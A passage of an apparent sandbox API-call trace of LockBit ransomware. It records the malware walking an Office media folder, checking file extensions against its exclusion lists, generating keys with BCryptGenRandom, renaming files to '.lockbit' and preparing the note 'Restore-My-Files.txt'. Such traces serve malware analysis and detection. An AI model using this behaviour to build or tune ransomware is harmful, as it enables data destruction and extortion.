lpString2=".WMF") returned -1 [0201.907] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0201.907] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0201.907] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0201.907] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0201.907] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0201.908] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0201.908] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0201.908] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0201.908] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0201.908] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0201.908] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0201.908] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0201.908] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0201.908] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0201.908] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0201.908] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.908] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0201.908] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0201.908] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0201.908] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0201.908] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18242_.WMF") returned 1 [0201.908] lstrcmpiW (lpString1="ntldr", lpString2="BD18242_.WMF") returned 1 [0201.908] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18242_.WMF") returned 1 [0201.908] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18242_.WMF") returned 1 [0201.908] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18242_.WMF") returned -1 [0201.908] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18242_.WMF") returned 1 [0201.908] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18242_.WMF") returned 1 [0201.908] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0201.908] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18242_.WMF") returned=".WMF" [0201.908] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0201.908] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0201.908] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0201.909] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0201.909] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0201.909] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0201.909] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0201.909] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0201.909] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0201.909] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0201.909] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0201.909] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0201.909] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0201.909] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0201.909] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0201.909] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0201.909] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0201.909] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0201.909] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0201.909] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0201.909] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0201.909] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0201.909] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0201.909] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0201.909] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0201.909] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0201.909] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0201.909] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0201.909] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18242_.WMF.lockbit") returned 79 [0201.910] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18242_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18242_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0201.912] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0201.912] malloc (_Size=0x40068) returned 0x3df0008 [0201.913] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2082) returned 1 [0201.913] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.914] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0201.914] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.914] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.915] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0201.915] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0201.924] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18242_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18242_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.925] malloc (_Size=0xb4) returned 0x1fa2ed8 [0201.925] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0xc0000008 [0201.925] free (_Block=0x1fa2ed8) [0201.925] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18242_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0201.925] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0201.925] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0201.925] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fb7e000, ftCreationTime.dwHighDateTime=0x1bdcf1d, ftLastAccessTime.dwLowDateTime=0xbcc98140, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x7fb7e000, ftLastWriteTime.dwHighDateTime=0x1bdcf1d, nFileSizeHigh=0x0, nFileSizeLow=0x822, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18243_.WMF", cAlternateFileName="")) returned 1 [0201.925] lstrcmpiW (lpString1=".", lpString2="BD18243_.WMF") returned -1 [0201.925] lstrcmpiW (lpString1="..", lpString2="BD18243_.WMF") returned -1 [0201.925] PathFindExtensionW (pszPath="BD18243_.WMF") returned=".WMF" [0201.925] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0201.925] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0201.925] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0201.925] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0201.925] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0201.925] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0201.925] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0201.925] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0201.925] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0201.925] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0201.925] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0201.926] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0201.926] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0201.926] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0201.926] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0201.926] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0201.926] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0201.926] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0201.926] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0201.926] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0201.926] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0201.926] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0201.926] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0201.926] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0201.926] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.926] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0201.926] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0201.926] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0201.926] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0201.926] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0201.926] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0201.926] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0201.926] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0201.926] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0201.926] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0201.926] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0201.926] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0201.926] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0201.927] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0201.927] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0201.927] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0201.927] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0201.927] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.927] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0201.927] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0201.927] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0201.927] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0201.927] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18243_.WMF") returned 1 [0201.927] lstrcmpiW (lpString1="ntldr", lpString2="BD18243_.WMF") returned 1 [0201.927] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18243_.WMF") returned 1 [0201.927] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18243_.WMF") returned 1 [0201.927] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18243_.WMF") returned -1 [0201.927] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18243_.WMF") returned 1 [0201.927] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18243_.WMF") returned 1 [0201.927] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0201.927] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18243_.WMF") returned=".WMF" [0201.927] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0201.927] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0201.927] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0201.927] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0201.927] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0201.927] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0201.927] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0201.928] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0201.928] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0201.928] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0201.928] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0201.928] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0201.928] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0201.928] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0201.928] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0201.928] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0201.928] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0201.928] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0201.928] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0201.928] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0201.928] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0201.928] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0201.928] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0201.928] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0201.928] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0201.928] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0201.928] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0201.928] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0201.928] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18243_.WMF.lockbit") returned 79 [0201.928] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18243_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18243_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0201.930] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0201.930] malloc (_Size=0x40068) returned 0x3df0008 [0201.930] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2082) returned 1 [0201.930] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.931] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0201.931] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.931] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0201.932] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0201.944] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18243_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18243_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.944] malloc (_Size=0xb4) returned 0x1fa2ed8 [0201.944] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0xc0000008 [0201.944] free (_Block=0x1fa2ed8) [0201.944] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18243_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0201.944] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0201.944] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0201.944] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d151300, ftCreationTime.dwHighDateTime=0x1bdcf22, ftLastAccessTime.dwLowDateTime=0xbcc98140, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x1d151300, ftLastWriteTime.dwHighDateTime=0x1bdcf22, nFileSizeHigh=0x0, nFileSizeLow=0x6ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18244_.WMF", cAlternateFileName="")) returned 1 [0201.945] lstrcmpiW (lpString1=".", lpString2="BD18244_.WMF") returned -1 [0201.945] lstrcmpiW (lpString1="..", lpString2="BD18244_.WMF") returned -1 [0201.945] PathFindExtensionW (pszPath="BD18244_.WMF") returned=".WMF" [0201.945] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0201.945] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0201.945] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0201.945] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0201.945] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0201.945] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0201.945] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0201.945] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0201.945] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0201.945] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0201.945] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0201.945] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0201.945] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0201.945] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0201.945] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0201.945] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0201.945] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0201.945] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0201.945] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0201.945] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0201.945] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0201.945] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0201.945] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0201.946] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0201.946] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.946] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0201.946] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0201.946] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0201.946] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0201.946] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0201.946] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0201.946] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0201.946] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0201.946] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0201.946] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0201.946] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0201.946] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0201.946] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0201.946] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0201.946] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0201.946] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0201.946] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0201.946] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.946] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0201.946] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0201.946] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0201.946] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0201.946] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18244_.WMF") returned 1 [0201.947] lstrcmpiW (lpString1="ntldr", lpString2="BD18244_.WMF") returned 1 [0201.947] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18244_.WMF") returned 1 [0201.947] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18244_.WMF") returned 1 [0201.947] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18244_.WMF") returned -1 [0201.947] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18244_.WMF") returned 1 [0201.947] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18244_.WMF") returned 1 [0201.947] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0201.947] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18244_.WMF") returned=".WMF" [0201.947] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0201.947] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0201.947] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0201.947] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0201.947] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0201.947] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0201.947] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0201.947] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0201.947] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0201.947] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0201.947] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0201.947] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0201.947] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0201.947] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0201.947] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0201.947] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0201.947] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0201.948] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0201.948] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0201.948] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0201.948] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0201.948] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0201.948] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0201.948] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0201.948] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0201.948] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0201.948] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0201.948] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0201.948] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18244_.WMF.lockbit") returned 79 [0201.948] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18244_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18244_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0201.950] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0201.950] malloc (_Size=0x40068) returned 0x3df0008 [0201.950] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1772) returned 1 [0201.950] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.950] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0201.950] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.951] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, 